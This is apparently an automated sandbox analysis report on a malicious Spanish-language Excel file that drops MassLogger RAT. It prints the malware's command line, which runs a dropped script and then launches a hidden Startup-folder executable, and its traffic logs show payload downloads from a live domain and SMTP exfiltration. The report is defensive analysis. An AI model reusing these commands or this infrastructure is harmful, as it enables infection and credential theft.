Play interactive tour

Edit tour

Analysis Report LIQUIDACION INTERBANCARIA 02_22_2021.xls

Overview

General Information

Sample Name:	LIQUIDACION INTERBANCARIA 02_22_2021.xls
Analysis ID:	356267
MD5:	8cc0e4d5044939ef3d7a7d8825d8c9c9
SHA1:	61ca1ae2ac0fa0fb0f075ee09f9ff83985b5b66b
SHA256:	35cf92b551f09ba61770ce1c7c5dc73b3c3e291eb98948c87d430646370a103f
Tags:	ESPgeoOutlookxls
Most interesting Screenshot:

Detection

Hidden Macro 4.0 MassLogger RAT

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Document exploit detected (creates forbidden files)

Document exploit detected (drops PE files)

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Yara detected MassLogger RAT

.NET source code contains method to dynamically call methods (often used by packers)

.NET source code contains potential unpacker

.NET source code references suspicious native API functions

Document exploit detected (UrlDownloadToFile)

Document exploit detected (process start blacklist hit)

Drops PE files to the startup folder

Drops PE files to the user root directory

Found Excel 4.0 Macro with suspicious formulas

Found obfuscated Excel 4.0 Macro

Machine Learning detection for dropped file

May check the online IP address of the machine

Office process drops PE file

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Suspicious powershell command line found

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file access)

Yara detected Beds Obfuscator

Yara detected Costura Assembly Loader

AV process strings found (often used to terminate AV products)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Contains capabilities to detect virtual machines

Contains long sleeps (>= 3 min)

Creates a DirectInput object (often for capturing keystrokes)

Creates a process in suspended mode (likely to inject code)

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Document contains embedded VBA macros

Drops PE files

Drops PE files to the application program directory (C:\ProgramData)

Enables debug privileges

Found WSH timer for Javascript or VBS script (likely evasive script)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

HTTP GET or POST without a user agent

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Potential document exploit detected (performs DNS queries)

Potential document exploit detected (performs HTTP gets)

Potential document exploit detected (unknown TCP traffic)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the product ID of Windows

Queries the volume information (name, serial number etc) of a device

Uses SMTP (mail sending)

Uses code obfuscation techniques (call, push, ret)

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Yara detected Credential Stealer

Yara signature match

Classification

Startup

System is w10x64

EXCEL.EXE (PID: 7032 cmdline: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding MD5: 5D6638F2C8F8571C593999C58866007E)

a.exe (PID: 6200 cmdline: C:\PROGRAMDATA\a.exe MD5: 7D9D8812398EAF9AC0D85E728BBF8637)

cmd.exe (PID: 6632 cmdline: cmd.exe /c timeout 4 & 'C:\Windows\System32\wscript.exe' 'C:\Users\user\AppData\Local\Temp\\499262.js' && powershell -command Start-Sleep -s 4; Start-Process -WindowStyle hidden -FilePath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 6616 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

timeout.exe (PID: 2860 cmdline: timeout 4 MD5: 121A4EDAE60A7AF6F5DFA82F7BB95659)

wscript.exe (PID: 4180 cmdline: 'C:\Windows\System32\wscript.exe' 'C:\Users\user\AppData\Local\Temp\\499262.js' MD5: 7075DD7B9BE8807FCA93ACD86F724884)

powershell.exe (PID: 5596 cmdline: powershell -command Start-Sleep -s 4; Start-Process -WindowStyle hidden -FilePath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe' MD5: DBA3E6449E97D4E3DF64527EF7012A10)

a.exe (PID: 6772 cmdline: 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe' MD5: 7D9D8812398EAF9AC0D85E728BBF8637)

a.exe (PID: 5508 cmdline: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe MD5: 7D9D8812398EAF9AC0D85E728BBF8637)

a.exe (PID: 740 cmdline: 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe' MD5: 7D9D8812398EAF9AC0D85E728BBF8637)

a.exe (PID: 6072 cmdline: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe MD5: 7D9D8812398EAF9AC0D85E728BBF8637)

a.exe (PID: 5036 cmdline: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe MD5: 7D9D8812398EAF9AC0D85E728BBF8637)

cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

Source	Rule	Description	Author	Strings
00000011.00000002.876240165.0000000007590000.00000004.00000001.sdmp	JoeSecurity_BedsObfuscator	Yara detected Beds Obfuscator	Joe Security
0000000B.00000002.777758927.0000000003B6D000.00000004.00000001.sdmp	Quasar_RAT_1	Detects Quasar RAT	Florian Roth	0xfc8d:$op1: 04 1E FE 02 04 16 FE 01 60 0xfb72:$op2: 00 17 03 1F 20 17 19 15 28 0x1030c:$op3: 00 04 03 69 91 1B 40 0x11a0b:$op3: 00 04 03 69 91 1B 40
0000000B.00000002.777758927.0000000003B6D000.00000004.00000001.sdmp	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
0000000B.00000002.777758927.0000000003B6D000.00000004.00000001.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
0000000D.00000002.947711194.0000000000402000.00000040.00000001.sdmp	Quasar_RAT_1	Detects Quasar RAT	Florian Roth	0x84d:$op1: 04 1E FE 02 04 16 FE 01 60 0x732:$op2: 00 17 03 1F 20 17 19 15 28 0xecc:$op3: 00 04 03 69 91 1B 40 0x25cb:$op3: 00 04 03 69 91 1B 40
0000000D.00000002.947711194.0000000000402000.00000040.00000001.sdmp	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
0000000D.00000002.947711194.0000000000402000.00000040.00000001.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000001.00000002.710965832.0000000003A90000.00000004.00000001.sdmp	Quasar_RAT_1	Detects Quasar RAT	Florian Roth	0xcc8d:$op1: 04 1E FE 02 04 16 FE 01 60 0xcb72:$op2: 00 17 03 1F 20 17 19 15 28 0xd30c:$op3: 00 04 03 69 91 1B 40 0xea0b:$op3: 00 04 03 69 91 1B 40
00000001.00000002.710965832.0000000003A90000.00000004.00000001.sdmp	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
00000001.00000002.710965832.0000000003A90000.00000004.00000001.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000001.00000002.710604971.0000000003889000.00000004.00000001.sdmp	Quasar_RAT_1	Detects Quasar RAT	Florian Roth	0x133c2d:$op1: 04 1E FE 02 04 16 FE 01 60 0x133b12:$op2: 00 17 03 1F 20 17 19 15 28 0x1342ac:$op3: 00 04 03 69 91 1B 40 0x1359ab:$op3: 00 04 03 69 91 1B 40
00000001.00000002.710604971.0000000003889000.00000004.00000001.sdmp	JoeSecurity_BedsObfuscator	Yara detected Beds Obfuscator	Joe Security
00000001.00000002.710604971.0000000003889000.00000004.00000001.sdmp	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
00000001.00000002.710604971.0000000003889000.00000004.00000001.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000011.00000002.853281517.00000000039A1000.00000004.00000001.sdmp	Quasar_RAT_1	Detects Quasar RAT	Florian Roth	0x917d:$op1: 04 1E FE 02 04 16 FE 01 60 0x9062:$op2: 00 17 03 1F 20 17 19 15 28 0x97fc:$op3: 00 04 03 69 91 1B 40 0xaefb:$op3: 00 04 03 69 91 1B 40
00000011.00000002.853281517.00000000039A1000.00000004.00000001.sdmp	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
00000011.00000002.853281517.00000000039A1000.00000004.00000001.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
0000000B.00000002.775905725.0000000003969000.00000004.00000001.sdmp	Quasar_RAT_1	Detects Quasar RAT	Florian Roth	0x133c2d:$op1: 04 1E FE 02 04 16 FE 01 60 0x133b12:$op2: 00 17 03 1F 20 17 19 15 28 0x1342ac:$op3: 00 04 03 69 91 1B 40 0x1359ab:$op3: 00 04 03 69 91 1B 40
0000000B.00000002.775905725.0000000003969000.00000004.00000001.sdmp	JoeSecurity_BedsObfuscator	Yara detected Beds Obfuscator	Joe Security
0000000B.00000002.775905725.0000000003969000.00000004.00000001.sdmp	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
0000000B.00000002.775905725.0000000003969000.00000004.00000001.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000011.00000002.858549049.0000000003C8C000.00000004.00000001.sdmp	Quasar_RAT_1	Detects Quasar RAT	Florian Roth	0x10c8d:$op1: 04 1E FE 02 04 16 FE 01 60 0x10b72:$op2: 00 17 03 1F 20 17 19 15 28 0x1130c:$op3: 00 04 03 69 91 1B 40 0x12a0b:$op3: 00 04 03 69 91 1B 40
00000011.00000002.858549049.0000000003C8C000.00000004.00000001.sdmp	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
00000011.00000002.858549049.0000000003C8C000.00000004.00000001.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
0000000B.00000002.775433502.0000000003881000.00000004.00000001.sdmp	Quasar_RAT_1	Detects Quasar RAT	Florian Roth	0x917d:$op1: 04 1E FE 02 04 16 FE 01 60 0x9062:$op2: 00 17 03 1F 20 17 19 15 28 0x97fc:$op3: 00 04 03 69 91 1B 40 0xaefb:$op3: 00 04 03 69 91 1B 40
0000000B.00000002.775433502.0000000003881000.00000004.00000001.sdmp	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
0000000B.00000002.775433502.0000000003881000.00000004.00000001.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000014.00000002.870308701.0000000002EE1000.00000004.00000001.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000014.00000002.870308701.0000000002EE1000.00000004.00000001.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000D.00000002.952842213.0000000002DF1000.00000004.00000001.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
0000000D.00000002.952842213.0000000002DF1000.00000004.00000001.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000001.00000002.715456049.0000000006E20000.00000004.00000001.sdmp	JoeSecurity_BedsObfuscator	Yara detected Beds Obfuscator	Joe Security
00000011.00000002.854642346.0000000003A89000.00000004.00000001.sdmp	Quasar_RAT_1	Detects Quasar RAT	Florian Roth	0x133c2d:$op1: 04 1E FE 02 04 16 FE 01 60 0x133b12:$op2: 00 17 03 1F 20 17 19 15 28 0x1342ac:$op3: 00 04 03 69 91 1B 40 0x1359ab:$op3: 00 04 03 69 91 1B 40
00000011.00000002.854642346.0000000003A89000.00000004.00000001.sdmp	JoeSecurity_BedsObfuscator	Yara detected Beds Obfuscator	Joe Security
00000011.00000002.854642346.0000000003A89000.00000004.00000001.sdmp	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
00000011.00000002.854642346.0000000003A89000.00000004.00000001.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
0000000B.00000002.789219576.0000000007530000.00000004.00000001.sdmp	JoeSecurity_BedsObfuscator	Yara detected Beds Obfuscator	Joe Security
00000014.00000002.866618994.0000000000402000.00000040.00000001.sdmp	Quasar_RAT_1	Detects Quasar RAT	Florian Roth	0x84d:$op1: 04 1E FE 02 04 16 FE 01 60 0x732:$op2: 00 17 03 1F 20 17 19 15 28 0xecc:$op3: 00 04 03 69 91 1B 40 0x25cb:$op3: 00 04 03 69 91 1B 40
00000014.00000002.866618994.0000000000402000.00000040.00000001.sdmp	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
00000014.00000002.866618994.0000000000402000.00000040.00000001.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
Process Memory Space: a.exe PID: 5036	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
Process Memory Space: a.exe PID: 5036	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
Process Memory Space: a.exe PID: 5036	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: a.exe PID: 6200	JoeSecurity_BedsObfuscator	Yara detected Beds Obfuscator	Joe Security
Process Memory Space: a.exe PID: 6200	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
Process Memory Space: a.exe PID: 6200	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
Process Memory Space: a.exe PID: 5508	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
Process Memory Space: a.exe PID: 5508	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
Process Memory Space: a.exe PID: 5508	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: a.exe PID: 6772	JoeSecurity_BedsObfuscator	Yara detected Beds Obfuscator	Joe Security
Process Memory Space: a.exe PID: 6772	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
Process Memory Space: a.exe PID: 6772	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
Process Memory Space: a.exe PID: 740	JoeSecurity_BedsObfuscator	Yara detected Beds Obfuscator	Joe Security
Process Memory Space: a.exe PID: 740	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
Process Memory Space: a.exe PID: 740	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
Click to see the 50 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
1.2.a.exe.39bc1e0.1.unpack	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
1.2.a.exe.39bc1e0.1.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
11.2.a.exe.3a9c1e0.1.unpack	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
11.2.a.exe.3a9c1e0.1.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
1.2.a.exe.6e20000.4.raw.unpack	JoeSecurity_BedsObfuscator	Yara detected Beds Obfuscator	Joe Security
1.2.a.exe.3a9c240.3.unpack	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
1.2.a.exe.3a9c240.3.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
17.2.a.exe.3bbc1e0.2.raw.unpack	Quasar_RAT_1	Detects Quasar RAT	Florian Roth	0xa4d:$op1: 04 1E FE 02 04 16 FE 01 60 0x932:$op2: 00 17 03 1F 20 17 19 15 28 0x10cc:$op3: 00 04 03 69 91 1B 40 0x27cb:$op3: 00 04 03 69 91 1B 40
17.2.a.exe.3bbc1e0.2.raw.unpack	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
17.2.a.exe.3bbc1e0.2.raw.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
11.2.a.exe.7530000.5.unpack	JoeSecurity_BedsObfuscator	Yara detected Beds Obfuscator	Joe Security
17.2.a.exe.3a89990.1.raw.unpack	Quasar_RAT_1	Detects Quasar RAT	Florian Roth	0x13329d:$op1: 04 1E FE 02 04 16 FE 01 60 0x133182:$op2: 00 17 03 1F 20 17 19 15 28 0x13391c:$op3: 00 04 03 69 91 1B 40 0x13501b:$op3: 00 04 03 69 91 1B 40
17.2.a.exe.3a89990.1.raw.unpack	JoeSecurity_BedsObfuscator	Yara detected Beds Obfuscator	Joe Security
17.2.a.exe.3a89990.1.raw.unpack	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
17.2.a.exe.3a89990.1.raw.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
11.2.a.exe.3a9c1e0.1.raw.unpack	Quasar_RAT_1	Detects Quasar RAT	Florian Roth	0xa4d:$op1: 04 1E FE 02 04 16 FE 01 60 0x932:$op2: 00 17 03 1F 20 17 19 15 28 0x10cc:$op3: 00 04 03 69 91 1B 40 0x27cb:$op3: 00 04 03 69 91 1B 40
11.2.a.exe.3a9c1e0.1.raw.unpack	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
11.2.a.exe.3a9c1e0.1.raw.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
1.2.a.exe.3889990.2.raw.unpack	Quasar_RAT_1	Detects Quasar RAT	Florian Roth	0x13329d:$op1: 04 1E FE 02 04 16 FE 01 60 0x133182:$op2: 00 17 03 1F 20 17 19 15 28 0x13391c:$op3: 00 04 03 69 91 1B 40 0x13501b:$op3: 00 04 03 69 91 1B 40
1.2.a.exe.3889990.2.raw.unpack	JoeSecurity_BedsObfuscator	Yara detected Beds Obfuscator	Joe Security
1.2.a.exe.3889990.2.raw.unpack	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
1.2.a.exe.3889990.2.raw.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
20.2.a.exe.400000.0.unpack	Quasar_RAT_1	Detects Quasar RAT	Florian Roth	0xa4d:$op1: 04 1E FE 02 04 16 FE 01 60 0x932:$op2: 00 17 03 1F 20 17 19 15 28 0x10cc:$op3: 00 04 03 69 91 1B 40 0x27cb:$op3: 00 04 03 69 91 1B 40
20.2.a.exe.400000.0.unpack	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
20.2.a.exe.400000.0.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
11.2.a.exe.3b7c240.3.raw.unpack	Quasar_RAT_1	Detects Quasar RAT	Florian Roth	0xa4d:$op1: 04 1E FE 02 04 16 FE 01 60 0x932:$op2: 00 17 03 1F 20 17 19 15 28 0x10cc:$op3: 00 04 03 69 91 1B 40 0x27cb:$op3: 00 04 03 69 91 1B 40
11.2.a.exe.3b7c240.3.raw.unpack	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
11.2.a.exe.3b7c240.3.raw.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
11.2.a.exe.3969990.2.raw.unpack	Quasar_RAT_1	Detects Quasar RAT	Florian Roth	0x13329d:$op1: 04 1E FE 02 04 16 FE 01 60 0x133182:$op2: 00 17 03 1F 20 17 19 15 28 0x13391c:$op3: 00 04 03 69 91 1B 40 0x13501b:$op3: 00 04 03 69 91 1B 40
11.2.a.exe.3969990.2.raw.unpack	JoeSecurity_BedsObfuscator	Yara detected Beds Obfuscator	Joe Security
11.2.a.exe.3969990.2.raw.unpack	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
11.2.a.exe.3969990.2.raw.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
17.2.a.exe.3a89990.1.unpack	JoeSecurity_BedsObfuscator	Yara detected Beds Obfuscator	Joe Security
17.2.a.exe.7590000.5.unpack	JoeSecurity_BedsObfuscator	Yara detected Beds Obfuscator	Joe Security
11.2.a.exe.3969990.2.unpack	JoeSecurity_BedsObfuscator	Yara detected Beds Obfuscator	Joe Security
11.2.a.exe.3b7c240.3.unpack	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
11.2.a.exe.3b7c240.3.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
1.2.a.exe.39bc1e0.1.raw.unpack	Quasar_RAT_1	Detects Quasar RAT	Florian Roth	0xa4d:$op1: 04 1E FE 02 04 16 FE 01 60 0x932:$op2: 00 17 03 1F 20 17 19 15 28 0x10cc:$op3: 00 04 03 69 91 1B 40 0x27cb:$op3: 00 04 03 69 91 1B 40
1.2.a.exe.39bc1e0.1.raw.unpack	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
1.2.a.exe.39bc1e0.1.raw.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
17.2.a.exe.3c9c240.3.unpack	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
17.2.a.exe.3c9c240.3.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
17.2.a.exe.3c9c240.3.raw.unpack	Quasar_RAT_1	Detects Quasar RAT	Florian Roth	0xa4d:$op1: 04 1E FE 02 04 16 FE 01 60 0x932:$op2: 00 17 03 1F 20 17 19 15 28 0x10cc:$op3: 00 04 03 69 91 1B 40 0x27cb:$op3: 00 04 03 69 91 1B 40
17.2.a.exe.3c9c240.3.raw.unpack	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
17.2.a.exe.3c9c240.3.raw.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
1.2.a.exe.3a9c240.3.raw.unpack	Quasar_RAT_1	Detects Quasar RAT	Florian Roth	0xa4d:$op1: 04 1E FE 02 04 16 FE 01 60 0x932:$op2: 00 17 03 1F 20 17 19 15 28 0x10cc:$op3: 00 04 03 69 91 1B 40 0x27cb:$op3: 00 04 03 69 91 1B 40
1.2.a.exe.3a9c240.3.raw.unpack	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
1.2.a.exe.3a9c240.3.raw.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
17.2.a.exe.7590000.5.raw.unpack	JoeSecurity_BedsObfuscator	Yara detected Beds Obfuscator	Joe Security
13.2.a.exe.400000.0.unpack	Quasar_RAT_1	Detects Quasar RAT	Florian Roth	0xa4d:$op1: 04 1E FE 02 04 16 FE 01 60 0x932:$op2: 00 17 03 1F 20 17 19 15 28 0x10cc:$op3: 00 04 03 69 91 1B 40 0x27cb:$op3: 00 04 03 69 91 1B 40
13.2.a.exe.400000.0.unpack	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
13.2.a.exe.400000.0.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
1.2.a.exe.6e20000.4.unpack	JoeSecurity_BedsObfuscator	Yara detected Beds Obfuscator	Joe Security
17.2.a.exe.3bbc1e0.2.unpack	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
17.2.a.exe.3bbc1e0.2.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
1.2.a.exe.3889990.2.unpack	JoeSecurity_BedsObfuscator	Yara detected Beds Obfuscator	Joe Security
11.2.a.exe.7530000.5.raw.unpack	JoeSecurity_BedsObfuscator	Yara detected Beds Obfuscator	Joe Security
Click to see the 52 entries

Sigma Overview

No Sigma rule has matched

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Antivirus detection for URL or domain

Show sources

Source: http://pastex.pro

Avira URL Cloud: Label: malware

Multi AV Scanner detection for dropped file

Show sources

Source: C:\ProgramData\a.exe	ReversingLabs: Detection: 27%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\mensajeria_system[1].exe	ReversingLabs: Detection: 27%

Machine Learning detection for dropped file

Show sources

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\mensajeria_system[1].exe	Joe Sandbox ML: detected
Source: C:\ProgramData\a.exe	Joe Sandbox ML: detected

Compliance:

Uses new MSVCR Dlls

Show sources

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

File opened: C:\Windows\SysWOW64\MSVCR100.dll

Uses secure TLS version for HTTPS connections

Show sources

Source: unknown	HTTPS traffic detected: 185.162.146.6:443 -> 192.168.2.4:49731 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.4:49741 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.4:49748 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.4:49755 version: TLS 1.2

Binary contains paths to debug symbols

Show sources

Source:	Binary string: /_/Src/Newtonsoft.Json/obj/Release/net40/Newtonsoft.Json.pdbSHA256f source: a.exe, 0000000D.00000003.896472012.0000000003F60000.00000004.00000001.sdmp
Source:	Binary string: C:\Users\Administrator\Desktop\CalcFis\obj\Debug\CalcFis.pdb source: a.exe, mensajeria_system[1].exe.0.dr
Source:	Binary string: /_/Src/Newtonsoft.Json/obj/Release/net40/Newtonsoft.Json.pdb source: a.exe, 0000000D.00000003.896472012.0000000003F60000.00000004.00000001.sdmp

Spreading:

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\

Software Vulnerabilities:

Document exploit detected (creates forbidden files)

Show sources

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\mensajeria_system[1].exe			Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	File created: C:\PROGRAMDATA\a.exe			Jump to behavior

Document exploit detected (drops PE files)

Show sources

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

File created: mensajeria_system[1].exe.0.dr

Jump to dropped file

Document exploit detected (UrlDownloadToFile)

Show sources

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

Section loaded: unknown origin: URLDownloadToFileA

Document exploit detected (process start blacklist hit)

Show sources

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

Process created: C:\ProgramData\a.exe

Source: global traffic

DNS query: name: www.seyranikenger.com.tr

Source: global traffic

TCP traffic: 192.168.2.4:49731 -> 185.162.146.6:443

Source: global traffic

TCP traffic: 192.168.2.4:49731 -> 185.162.146.6:443

Networking:

May check the online IP address of the machine

Show sources

Source: unknown	DNS query: name: api.ipify.org
Source: unknown	DNS query: name: api.ipify.org
Source: unknown	DNS query: name: api.ipify.org
Source: unknown	DNS query: name: api.ipify.org
Source: unknown	DNS query: name: api.ipify.org
Source: unknown	DNS query: name: api.ipify.org

Source: global traffic

TCP traffic: 192.168.2.4:49761 -> 208.91.199.223:587

Source: global traffic	HTTP traffic detected: GET /b/AEmdBGcmp HTTP/1.1Host: pastex.proConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /b/AEmdBGcmp HTTP/1.1Host: pastex.proConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: api.ipify.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /b/AEmdBGcmp HTTP/1.1Host: pastex.proConnection: Keep-Alive

Source: Joe Sandbox View	IP Address: 54.225.220.115 54.225.220.115
Source: Joe Sandbox View	IP Address: 54.225.220.115 54.225.220.115

Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View	JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: global traffic

TCP traffic: 192.168.2.4:49761 -> 208.91.199.223:587

Source: global traffic	HTTP traffic detected: GET /b/AEmdBGcmp HTTP/1.1Host: pastex.proConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /b/AEmdBGcmp HTTP/1.1Host: pastex.proConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: api.ipify.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /b/AEmdBGcmp HTTP/1.1Host: pastex.proConnection: Keep-Alive

Source: a.exe, 0000000D.00000002.952842213.0000000002DF1000.00000004.00000001.sdmp, a.exe, 00000014.00000002.870308701.0000000002EE1000.00000004.00000001.sdmp

String found in binary or memory: fUsage: https://www.youtube.com/watch?v=Qxk6cu21JSg equals www.youtube.com (Youtube)

Source: unknown

DNS traffic detected: queries for: www.seyranikenger.com.tr

Source: a.exe, 0000000D.00000002.953221642.0000000002EFA000.00000004.00000001.sdmp	String found in binary or memory: http://api.ipify
